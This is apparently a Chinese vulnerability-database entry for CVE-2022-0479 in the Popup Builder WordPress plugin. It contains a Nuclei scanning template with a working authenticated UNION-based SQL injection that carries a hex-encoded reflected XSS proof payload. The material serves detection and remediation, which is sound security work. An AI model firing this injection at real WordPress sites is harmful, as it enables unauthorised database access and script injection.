CVE-2022-0479: Popup Builder Plugin - SQL Injection and Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Popup Builder Plugin | POC: 已公开

漏洞描述

The Popup Builder WordPress plugin before 4.1.1 is vulnerable to SQL Injection and Reflected XSS via the sgpb-subscription-popup-id parameter.

PoC代码[已公开]

id: CVE-2022-0479

info:
  name: Popup Builder Plugin - SQL Injection and Cross-Site Scripting
  author: ritikchaddha
  severity: critical
  description: |
    The Popup Builder WordPress plugin before 4.1.1 is vulnerable to SQL Injection and Reflected XSS via the sgpb-subscription-popup-id parameter.
  impact: |
    Allows attackers to execute malicious SQL queries and inject scripts into web pages
  remediation: |
    Update Popup Builder Plugin to the latest secure version
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0479
    cwe-id: CWE-89
    epss-score: 0.76374
    epss-percentile: 0.98896
    cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: sygnoos
    product: popup_builder
    framework: wordpress
    fofa-query: body="/wp-content/plugins/popup-builder"
  tags: cve,cve2022,wp,wp-plugin,wordpress,popup-builder,xss,sqli,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "/wp-content/plugins/popup-builder")'
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/edit.php?post_type=popupbuilder&page=sgpbSubscribers&sgpb-subscription-popup-id=0%29+union+all++select+1%2C0x3c696d6720737263206f6e6572726f723d616c65727428646f63756d656e742e646f6d61696e293e%2C3%2C4%2C5%2C6+--+g HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=onerror=alert(document.domain)></td><td>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a00463044022048eeda5533f67abd965b3802ccdb85ba7a48838cd1c2cdf75669c3f22858806902206c28d315ec9854877e51c81236ad60888c54cf3f7d00607e5890393dac4e6874:922c64590222798bb761d5b6d8e72950

相关漏洞推荐